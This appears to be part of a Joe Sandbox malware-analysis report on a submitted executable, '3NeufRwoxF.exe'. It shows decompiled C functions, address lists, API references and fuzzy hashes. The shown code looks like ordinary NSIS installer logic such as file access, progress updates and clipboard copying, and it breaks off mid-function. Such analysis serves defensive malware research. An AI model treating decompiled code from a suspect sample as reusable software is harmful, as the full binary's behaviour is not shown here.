0x00406554
0x00406557
0x0040655a
0x0040655a
0x0040655f
0x0040655f
0x00406561
0x00406564
0x0040656b
0x0040656e
0x0040659b
0x0040659b
0x0040659e
0x004065a1
0x00406615
0x00406615
0x00406615
0x00000000
0x00406615
0x004065a3
0x004065a9
0x004065ac
0x004065af
0x004065b2
0x004065b5
0x004065b8
0x004065bb
0x004065be
0x004065c1
0x004065c4
0x004065dd
0x004065df
0x004065e2
0x004065e3
0x004065e6
0x004065e8
0x004065eb
0x004065ed
0x004065ef
0x004065f2
0x004065f4
0x004065f7
0x004065fb
0x004065fd
0x004065fd
0x004065fe
0x00406601
0x00406604
0x004065c6
0x004065c6
0x004065ce
0x004065d3
0x004065d5
0x004065d8
0x004065d8
0x00406607
0x0040660e
0x00406598
0x00406598
0x00406598
0x00406598
0x00000000
0x00406610
0x00000000
0x00406610
0x0040660e
0x00406521
0x00406524
0x00406526
0x00406529
0x0040652c
0x0040652f
0x00406531
0x00406534
0x00406537
0x00406537
0x0040653a
0x0040653a
0x0040653d
0x00406544
0x00406518
0x00406518
0x00406518
0x00406518
0x00000000
0x00406546
0x00000000
0x00406546
0x00406544
0x004064ca
0x004064cd
0x004064cf
0x004064d2
0x00000000
0x00000000
0x00406231
0x00406231
0x00406235
0x0040687a
0x00000000
0x0040687a
0x0040623b
0x0040623e
0x00406241
0x00406244
0x00406247
0x0040624a
0x0040624d
0x0040624f
0x00406252
0x00406255
0x00406258
0x0040625a
0x0040625a
0x0040625a
0x00000000
0x00000000
0x004063bc
0x004063bc
0x004063c0
0x00406886
0x00000000
0x00406886
0x004063c6
0x004063c9
0x004063cc
0x004063cf
0x004063d1
0x004063d1
0x004063d1
0x004063d4
0x004063d7
0x004063da
0x004063dd
0x004063e0
0x004063e3
0x004063e4
0x004063e6
0x004063e6
0x004063e6
0x004063e9
0x004063ec
0x004063ef
0x004063f2
0x004063f2
0x004063f2
0x004063f5
0x004063f7
0x004063f7
0x00000000
0x00000000
0x00406639
0x00406639
0x00406639
0x0040663d
0x00000000
0x00000000
0x00406643
0x00406646
0x00406649
0x0040664c
0x0040664e
0x0040664e
0x0040664e
0x00406651
0x00406654
0x00406657
0x0040665a
0x0040665d
0x00406660
0x00406661
0x00406663
0x00406663
0x00406663
0x00406666
0x00406669
0x0040666c
0x0040666f
0x00406672
0x00406676
0x00406678
0x0040667b
0x00000000
0x0040667d
0x004063fa
0x004063fa
0x00000000
0x004063fa
0x0040667b
0x004068b0
0x00000000
0x00000000
0x00405edf
0x004068e7
0x004068e7
0x00000000
0x004068e7
0x00406734
0x004066bb
0x004066b8

Memory Dump Source

Source File: 00000000.00000002.655618767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.655607705.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.655678725.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.655695462.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655746163.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655768064.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655776920.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3NeufRwoxF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0236bc9d37fb86cbfb05d60328db13b4a1015dd2f3925378243861a98d78361
Instruction ID: 03af6c1e27b970ccc0602dedbaa06cf660f45ac3eaa39f8bc43b8226cdf4d636
Opcode Fuzzy Hash: c0236bc9d37fb86cbfb05d60328db13b4a1015dd2f3925378243861a98d78361
Instruction Fuzzy Hash: 46715571D00229DFEF28CF98C844BADBBB1FB44305F15806AD816BB281C7789A96DF44

Uniqueness

Uniqueness Score: -1.00%

Function 00401389, Relevance: 3.0, APIs: 2, Instructions: 43
windowCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x423ed0;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x42368c =  *0x42368c + _t12;
						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x42368c, 0x7530,  *0x423674), 0);
					}
				}
				return 0;
			}

0x0040138a
0x004013fa
0x0040139b
0x004013a0
0x00000000
0x00000000
0x004013a2
0x004013a3
0x004013ad
0x00000000
0x00401404
0x004013b0
0x004013b7
0x004013bd
0x004013be
0x004013c0
0x004013c2
0x004013b9
0x004013b9
0x004013ba
0x004013ba
0x004013c9
0x004013cb
0x004013f4
0x004013f4
0x004013c9
0x00000000

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageA.USER32(?,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.655618767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.655607705.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.655678725.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.655695462.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655746163.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655768064.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655776920.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3NeufRwoxF.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 7b8e9ba5108b55dad21e1cb19ef7846daac3b048e1c883625bc8c045044f289d
Instruction ID: b71ad761f0ea07ecc4e6183a90c0cd8288537aab3e92bb5761005deb6e4a9b1f
Opcode Fuzzy Hash: 7b8e9ba5108b55dad21e1cb19ef7846daac3b048e1c883625bc8c045044f289d
Instruction Fuzzy Hash: 20014431B24210ABE7291B388D08B2A32ADE714315F10423FF801F32F0D678DC028B4C

Uniqueness

Uniqueness Score: -1.00%

Function 0040575C, Relevance: 3.0, APIs: 2, Instructions: 16
fileCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E0040575C(CHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesA(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}

0x00405760
0x0040576d
0x00405782
0x00405788

APIs

GetFileAttributesA.KERNELBASE(00000003,00402C9E,C:\Users\user\Desktop\3NeufRwoxF.exe,80000000,00000003), ref: 00405760
CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405782

Memory Dump Source

Source File: 00000000.00000002.655618767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.655607705.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.655678725.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.655695462.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655746163.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655768064.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655776920.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3NeufRwoxF.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 6d56aff3fab625e069b8f0f4beb3d6c68df7a2746e2dd21b0a72e0224e52029a
Instruction ID: 90a47e22fdd321f70bf06df01bfdefa11f3e73682391c7296034eb3a8fe04f39
Opcode Fuzzy Hash: 6d56aff3fab625e069b8f0f4beb3d6c68df7a2746e2dd21b0a72e0224e52029a
Instruction Fuzzy Hash: 8CD09E31658301AFEF098F20DD1AF2E7AA2EB84B00F10562CB646940E0D6715815DB16

Uniqueness

Uniqueness Score: -1.00%

Function 0040573D, Relevance: 3.0, APIs: 2, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040573D(CHAR* _a4) {
				signed char _t3;

				_t3 = GetFileAttributesA(_a4); // executed
				if(_t3 != 0xffffffff) {
					return SetFileAttributesA(_a4, _t3 & 0x000000fe);
				}
				return _t3;
			}

0x00405741
0x0040574a
0x00000000
0x00405753
0x00405759

APIs

GetFileAttributesA.KERNELBASE(?,00405548,?,?,?), ref: 00405741
SetFileAttributesA.KERNEL32(?,00000000), ref: 00405753

Memory Dump Source

Source File: 00000000.00000002.655618767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.655607705.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.655678725.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.655695462.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655746163.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655768064.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655776920.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3NeufRwoxF.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 499c41a265c8c72c251eb99c81a2d8ea197c0ca55525d81af5d9f53b6a62e1c9
Instruction ID: 88d4634cff9a4ddd1fee40d2dea465eb4d792ab4199cb35d7d0d1e1f6e6e1bf9
Opcode Fuzzy Hash: 499c41a265c8c72c251eb99c81a2d8ea197c0ca55525d81af5d9f53b6a62e1c9
Instruction Fuzzy Hash: CAC04CB1808501EBD6016B24DF0D81F7B66EB50321B108B35F569E00F0C7755C66EA1A

Uniqueness

Uniqueness Score: -1.00%

Function 004031A8, Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004031A8(void* _a4, long _a8) {
				int _t6;
				long _t10;

				_t10 = _a8;
				_t6 = ReadFile( *0x409010, _a4, _t10,  &_a8, 0); // executed
				if(_t6 == 0 || _a8 != _t10) {
					return 0;
				} else {
					return 1;
				}
			}

0x004031ac
0x004031bf
0x004031c7
0x00000000
0x004031ce
0x00000000
0x004031d0

APIs

ReadFile.KERNELBASE(00409128,00000000,00000000,00000000,00413038,0040B038,004030AD,00413038,00004000,?,00000000,?,00402F37,00000004,00000000,00000000), ref: 004031BF

Memory Dump Source

Source File: 00000000.00000002.655618767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.655607705.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.655678725.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.655695462.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655746163.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655768064.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655776920.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3NeufRwoxF.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: b55c46bdf794a51955d6c22ef273c930d40ecd644cbb4da6e13cbea0766faea3
Instruction ID: b8f1ad64850fa721b7c3123cc302f733781f6218d307da9d2aa6486ecc23217a
Opcode Fuzzy Hash: b55c46bdf794a51955d6c22ef273c930d40ecd644cbb4da6e13cbea0766faea3
Instruction Fuzzy Hash: 4BE08632254119BBCF105E619C00AD73F5CEB0A3A2F008432FD55E9190D230EA11DBA5

Uniqueness

Uniqueness Score: -1.00%

Function 004031DA, Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004031DA(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x409010, _a4, 0, 0); // executed
				return _t2;
			}

0x004031e8
0x004031ee

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E86,?), ref: 004031E8

Memory Dump Source

Source File: 00000000.00000002.655618767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.655607705.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.655678725.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.655695462.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655746163.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655768064.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655776920.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3NeufRwoxF.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: a4f108b6483d59a247dd719aa3338c70368b303c79d310cc125f674897935547
Instruction ID: 0cdacc43d416a0c3c320ce55ce8d4373a9ea66752a7e2c64ddc4eeaf6ba3fa4d
Opcode Fuzzy Hash: a4f108b6483d59a247dd719aa3338c70368b303c79d310cc125f674897935547
Instruction Fuzzy Hash: 49B01271644200BFDA214F00DF05F057B31B790700F108430B394380F082712420EB0D

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00404F61, Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 278
windowclipboardmemoryCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00404F61(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t87;
				unsigned int _t92;
				int _t94;
				int _t95;
				void* _t101;
				intOrPtr _t112;
				intOrPtr _t123;
				struct HWND__* _t127;
				int _t149;
				int _t150;
				struct HWND__* _t154;
				struct HWND__* _t158;
				struct HMENU__* _t160;
				long _t162;
				void* _t163;
				short* _t164;

				_t154 =  *0x423684;
				_t149 = 0;
				_v8 = _t154;
				if(_a8 != 0x110) {
					if(_a8 == 0x405) {
						CloseHandle(CreateThread(0, 0, E00404EF5, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
					}
					if(_a8 != 0x111) {
						L17:
						if(_a8 != 0x404) {
							L25:
							if(_a8 != 0x7b || _a12 != _t154) {
								goto L20;
							} else {
								_t87 = SendMessageA(_t154, 0x1004, _t149, _t149);
								_a8 = _t87;
								if(_t87 <= _t149) {
									L37:
									return 0;
								}
								_t160 = CreatePopupMenu();
								AppendMenuA(_t160, _t149, 1, E00405AA7(_t149, _t154, _t160, _t149, 0xffffffe1));
								_t92 = _a16;
								if(_t92 != 0xffffffff) {
									_t150 = _t92;
									_t94 = _t92 >> 0x10;
								} else {
									GetWindowRect(_t154,  &_v28);
									_t150 = _v28.left;
									_t94 = _v28.top;
								}
								_t95 = TrackPopupMenu(_t160, 0x180, _t150, _t94, _t149, _a4, _t149);
								_t162 = 1;
								if(_t95 == 1) {
									_v60 = _t149;
									_v48 = 0x420498;
									_v44 = 0xfff;
									_a4 = _a8;
									do {
										_a4 = _a4 - 1;
										_t162 = _t162 + SendMessageA(_v8, 0x102d, _a4,  &_v68) + 2;
									} while (_a4 != _t149);
									OpenClipboard(_t149);
									EmptyClipboard();
									_t101 = GlobalAlloc(0x42, _t162);
									_a4 = _t101;
									_t163 = GlobalLock(_t101);
									do {
										_v48 = _t163;
										_t164 = _t163 + SendMessageA(_v8, 0x102d, _t149,  &_v68);
										 *_t164 = 0xa0d;
										_t163 = _t164 + 2;
										_t149 = _t149 + 1;
									} while (_t149 < _a8);
									GlobalUnlock(_a4);
									SetClipboardData(1, _a4);
									CloseClipboard();
								}
								goto L37;
							}
						}
						if( *0x42366c == _t149) {
							ShowWindow( *0x423ea8, 8);
							if( *0x423f2c == _t149) {
								_t112 =  *0x41fc68; // 0x0
								E00404E23( *((intOrPtr*)(_t112 + 0x34)), _t149);
							}
							E00403E10(1);
							goto L25;
						}
						 *0x41f860 = 2;
						E00403E10(0x78);
						goto L20;
					} else {
						if(_a12 != 0x403) {
							L20:
							return E00403E9E(_a8, _a12, _a16);
						}
						ShowWindow( *0x423670, _t149);
						ShowWindow(_t154, 8);
						E00403E6C(_t154);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_v60 = 2;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t123 =  *0x423eb0;
				_a8 =  *((intOrPtr*)(_t123 + 0x5c));
				_a12 =  *((intOrPtr*)(_t123 + 0x60));
				 *0x423670 = GetDlgItem(_a4, 0x403);
				 *0x423668 = GetDlgItem(_a4, 0x3ee);
				_t127 = GetDlgItem(_a4, 0x3f8);
				 *0x423684 = _t127;
				_v8 = _t127;
				E00403E6C( *0x423670);
				 *0x423674 = E004046C5(4);
				 *0x42368c = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(0x15);
				SendMessageA(_v8, 0x101b, 0,  &_v60);
				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
				if(_a8 >= 0) {
					SendMessageA(_v8, 0x1001, 0, _a8);
					SendMessageA(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t149) {
					SendMessageA(_v8, 0x1024, _t149, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E00403E37(_a4);
				if(( *0x423eb8 & 0x00000003) != 0) {
					ShowWindow( *0x423670, _t149);
					if(( *0x423eb8 & 0x00000002) != 0) {
						 *0x423670 = _t149;
					} else {
						ShowWindow(_v8, 8);
					}
					E00403E6C( *0x423668);
				}
				_t158 = GetDlgItem(_a4, 0x3ec);
				SendMessageA(_t158, 0x401, _t149, 0x75300000);
				if(( *0x423eb8 & 0x00000004) != 0) {
					SendMessageA(_t158, 0x409, _t149, _a12);
					SendMessageA(_t158, 0x2001, _t149, _a8);
				}
				goto L37;
			}

0x00404f6a
0x00404f70
0x00404f79
0x00404f7c
0x00405114
0x00405138
0x00405138
0x0040514b
0x00405169
0x00405170
0x004051c7
0x004051cb
0x00000000
0x004051d2
0x004051da
0x004051e2
0x004051e5
0x004052de
0x00000000
0x004052de
0x004051f4
0x00405200
0x00405206
0x0040520c
0x00405221
0x00405227
0x0040520e
0x00405213
0x00405219
0x0040521c
0x0040521c
0x00405237
0x0040523f
0x00405242
0x0040524b
0x0040524e
0x00405255
0x0040525c
0x00405264
0x00405264
0x0040527b
0x0040527b
0x00405282
0x00405288
0x00405291
0x00405298
0x004052a1
0x004052a3
0x004052a6
0x004052b5
0x004052b7
0x004052bd
0x004052be
0x004052bf
0x004052c7
0x004052d2
0x004052d8
0x004052d8
0x00000000
0x00405242
0x004051cb
0x00405178
0x004051a8
0x004051b0
0x004051b2
0x004051bb
0x004051bb
0x004051c2
0x00000000
0x004051c2
0x0040517c
0x00405186
0x00000000
0x0040514d
0x00405153
0x0040518b
0x00000000
0x00405194
0x0040515c
0x00405161
0x00405164
0x00000000
0x00405164
0x0040514b
0x00404f82
0x00404f86
0x00404f8f
0x00404f96
0x00404f99
0x00404f9c
0x00404f9f
0x00404fa0
0x00404fa1
0x00404fba
0x00404fbd
0x00404fc7
0x00404fd6
0x00404fde
0x00404fe6
0x00404feb
0x00404fee
0x00404ffa
0x00405003
0x0040500c
0x0040502f
0x00405035
0x00405046
0x0040504b
0x00405059
0x00405067
0x00405067
0x0040506c
0x0040507a
0x0040507a
0x0040507f
0x00405082
0x00405087
0x00405093
0x0040509c
0x004050a9
0x004050b8
0x004050ab
0x004050b0
0x004050b0
0x004050c4
0x004050c4
0x004050d8
0x004050e1
0x004050ea
0x004050fa
0x00405106
0x00405106
0x00000000

APIs

GetDlgItem.USER32 ref: 00404FC0
GetDlgItem.USER32 ref: 00404FCF
GetClientRect.USER32 ref: 0040500C
GetSystemMetrics.USER32 ref: 00405014
SendMessageA.USER32(?,0000101B,00000000,00000002), ref: 00405035
SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00405046
SendMessageA.USER32(?,00001001,00000000,00000110), ref: 00405059
SendMessageA.USER32(?,00001026,00000000,00000110), ref: 00405067
SendMessageA.USER32(?,00001024,00000000,?), ref: 0040507A
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040509C
ShowWindow.USER32(?,00000008), ref: 004050B0
GetDlgItem.USER32 ref: 004050D1
SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 004050E1
SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004050FA
SendMessageA.USER32(00000000,00002001,00000000,00000110), ref: 00405106
GetDlgItem.USER32 ref: 00404FDE

Part of subcall function 00403E6C: SendMessageA.USER32(00000028,?,00000001,00403C9D), ref: 00403E7A

GetDlgItem.USER32 ref: 00405123
CreateThread.KERNEL32(00000000,00000000,Function_00004EF5,00000000), ref: 00405131
CloseHandle.KERNEL32(00000000), ref: 00405138
ShowWindow.USER32(00000000), ref: 0040515C
ShowWindow.USER32(?,00000008), ref: 00405161
ShowWindow.USER32(00000008), ref: 004051A8
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004051DA
CreatePopupMenu.USER32 ref: 004051EB
AppendMenuA.USER32 ref: 00405200
GetWindowRect.USER32 ref: 00405213
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405237
SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405272
OpenClipboard.USER32(00000000), ref: 00405282
EmptyClipboard.USER32(?,?,00000000,?,00000000), ref: 00405288
GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 00405291
GlobalLock.KERNEL32 ref: 0040529B
SendMessageA.USER32(?,0000102D,00000000,?), ref: 004052AF
GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 004052C7
SetClipboardData.USER32(00000001,00000000), ref: 004052D2
CloseClipboard.USER32(?,?,00000000,?,00000000), ref: 004052D8

Strings

{, xrefs: 004051C7

Memory Dump Source

Source File: 00000000.00000002.655618767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.655607705.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.655678725.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.655695462.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655746163.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655768064.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655776920.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3NeufRwoxF.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: {
API String ID: 590372296-366298937
Opcode ID: b76f0574efc38b34ce8dbf5e96f3f583adbecdbce84d3d3c4a555a9ceab87f0c
Instruction ID: fc5da488f7bc2ad647f0a41a3fd7729356532ad04293fc61f6ec29e3deb516b2
Opcode Fuzzy Hash: b76f0574efc38b34ce8dbf5e96f3f583adbecdbce84d3d3c4a555a9ceab87f0c
Instruction Fuzzy Hash: 94A14B70900208BFDB219F60DD89AAE7F79FB08355F10417AFA04BA2A0C7795E41DF69

Uniqueness

Uniqueness Score: -1.00%

Function 00404772, Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 478
windowmemoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E00404772(struct HWND__* _a4, int _a8, unsigned int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				signed int _v16;
				intOrPtr _v20;
				void* _v24;
				long _v28;
				int _v32;
				signed int _v40;
				int _v44;
				signed int* _v56;
				intOrPtr _v60;
				signed int _v64;
				long _v68;
				void* _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t182;
				int _t196;
				long _t202;
				signed int _t206;
				signed int _t217;
				void* _t220;
				void* _t221;
				int _t227;
				signed int _t232;
				signed int _t233;
				signed int _t240;
				struct HBITMAP__* _t250;
				void* _t252;
				char* _t268;
				signed char _t269;
				long _t274;
				int _t280;
				signed int* _t281;
				int _t282;
				long _t283;
				int _t285;
				long _t286;
				signed int _t287;
				long _t288;
				signed int _t291;
				signed int _t298;
				signed int _t300;
				signed int _t302;
				int* _t310;
				void* _t311;
				int _t315;
				int _t316;
				int _t317;
				signed int _t318;
				void* _t320;

				_v12 = GetDlgItem(_a4, 0x3f9);
				_t182 = GetDlgItem(_a4, 0x408);
				_t280 =  *0x423ec8;
				_t320 = SendMessageA;
				_v8 = _t182;
				_t315 = 0;
				_v32 = _t280;
				_v20 =  *0x423eb0 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t289 = _a16;
					} else {
						_a12 = _t315;
						_t289 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t289;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t289 + 4)) == 0x408) {
							if(( *0x423eb9 & 0x00000002) != 0) {
								L41:
								if(_v16 != _t315) {
									_t232 = _v16;
									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6e) {
										SendMessageA(_v8, 0x419, _t315,  *(_t232 + 0x5c));
									}
									_t233 = _v16;
									if( *((intOrPtr*)(_t233 + 8)) == 0xfffffe6a) {
										if( *((intOrPtr*)(_t233 + 0xc)) != 2) {
											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) & 0xffffffdf;
										} else {
											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t289 = 0 | _a8 != 0x00000413;
								_t240 = E004046F2(_v8, _a8 != 0x413);
								if(_t240 >= _t315) {
									_t93 = _t280 + 8; // 0x8
									_t310 = _t240 * 0x418 + _t93;
									_t289 =  *_t310;
									if((_t289 & 0x00000010) == 0) {
										if((_t289 & 0x00000040) == 0) {
											_t298 = _t289 ^ 0x00000001;
										} else {
											_t300 = _t289 ^ 0x00000080;
											if(_t300 >= 0) {
												_t298 = _t300 & 0xfffffffe;
											} else {
												_t298 = _t300 | 0x00000001;
											}
										}
										 *_t310 = _t298;
										E0040117D(_t240);
										_t289 = 1;
										_a8 = 0x40f;
										_a12 = 1;
										_a16 =  !( *0x423eb8) >> 0x00000008 & 1;
									}
								}
								goto L41;
							}
							_t289 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageA(_v8, 0x200, _t315, _t315);
							}
							if(_a8 == 0x40b) {
								_t220 =  *0x420474;
								if(_t220 != _t315) {
									ImageList_Destroy(_t220);
								}
								_t221 =  *0x42048c;
								if(_t221 != _t315) {
									GlobalFree(_t221);
								}
								 *0x420474 = _t315;
								 *0x42048c = _t315;
								 *0x423f00 = _t315;
							}
							if(_a8 != 0x40f) {
								L86:
								if(_a8 == 0x420 && ( *0x423eb9 & 0x00000001) != 0) {
									_t316 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t316);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t316);
								}
								goto L89;
							} else {
								E004011EF(_t289, _t315, _t315);
								if(_a12 != _t315) {
									E0040140B(8);
								}
								if(_a16 == _t315) {
									L73:
									E004011EF(_t289, _t315, _t315);
									_v32 =  *0x42048c;
									_t196 =  *0x423ec8;
									_v60 = 0xf030;
									_v16 = _t315;
									if( *0x423ecc <= _t315) {
										L84:
										InvalidateRect(_v8, _t315, 1);
										if( *((intOrPtr*)( *0x42367c + 0x10)) != _t315) {
											E00404610(0x3ff, 0xfffffffb, E004046C5(5));
										}
										goto L86;
									}
									_t281 = _t196 + 8;
									do {
										_t202 =  *((intOrPtr*)(_v32 + _v16 * 4));
										if(_t202 != _t315) {
											_t291 =  *_t281;
											_v68 = _t202;
											_v72 = 8;
											if((_t291 & 0x00000001) != 0) {
												_v72 = 9;
												_v56 =  &(_t281[4]);
												_t281[0] = _t281[0] & 0x000000fe;
											}
											if((_t291 & 0x00000040) == 0) {
												_t206 = (_t291 & 0x00000001) + 1;
												if((_t291 & 0x00000010) != 0) {
													_t206 = _t206 + 3;
												}
											} else {
												_t206 = 3;
											}
											_v64 = (_t206 << 0x0000000b | _t291 & 0x00000008) + (_t206 << 0x0000000b | _t291 & 0x00000008) | _t291 & 0x00000020;
											SendMessageA(_v8, 0x1102, (_t291 >> 0x00000005 & 0x00000001) + 1, _v68);
